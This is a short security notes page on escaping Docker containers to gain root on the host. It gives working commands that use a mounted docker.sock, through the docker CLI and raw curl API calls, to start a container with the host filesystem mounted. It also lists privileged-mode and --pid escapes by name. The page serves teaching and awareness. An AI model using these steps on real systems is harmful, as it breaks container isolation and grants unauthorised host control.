search

Gaining root access to a DOCKER Host

hashtag
1. Via /var/run/docker.sock mount

docker run -it -v /var/run/docker.sock:/container/mypath/docker.sock ubuntu
apt-get update
apt-get install -y docker.io
docker -H unix://container/mypath/docker.sock ps

Inside the container ...

docker -H unix://container/mypath/docker.sock run  -it -v /:/mnt/host ubuntu bash
   cat /mnt/host/etc/hostname
   exit

Is this unusal ?? Nope

Check out https://www.portainer.io/installation/ ... any questions? :-)

Something tricky

apt-get update
apt-get install -y curl jq

curl --unix-socket /container/mypath/docker.sock http://localhost/v1.41/version

ID=$(curl -XPOST --unix-socket /container/mypath/docker.sock -d '{"Image":"docker.io/library/nginx:latest"}' -H 'Content-Type: application/json' http://localhost/v1.41/containers/create |  jq -r .Id)

curl -XPOST --unix-socket /container/mypath/docker.sock  -H 'Content-Type: application/json' http://localhost/v1.41/containers/$ID/start 

curl -XGET --unix-socket /container/mypath/docker.sock  -H 'Content-Type: application/json' http://localhost/v1.41/containers/json

hashtag
2. Intercepting /var/run/docker.sock

hashtag
3. Via mounting "dangerous" locations

see /examples/host_mount see /addons/pod_escape_log.md

hashtag
4. Via --priviledged (1)

Check out this. https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1

hashtag
5. Via --pid

Use a standard ubuntu image with nsenter / lsns ....

PreviousexamplesNexthost_mount

Last updated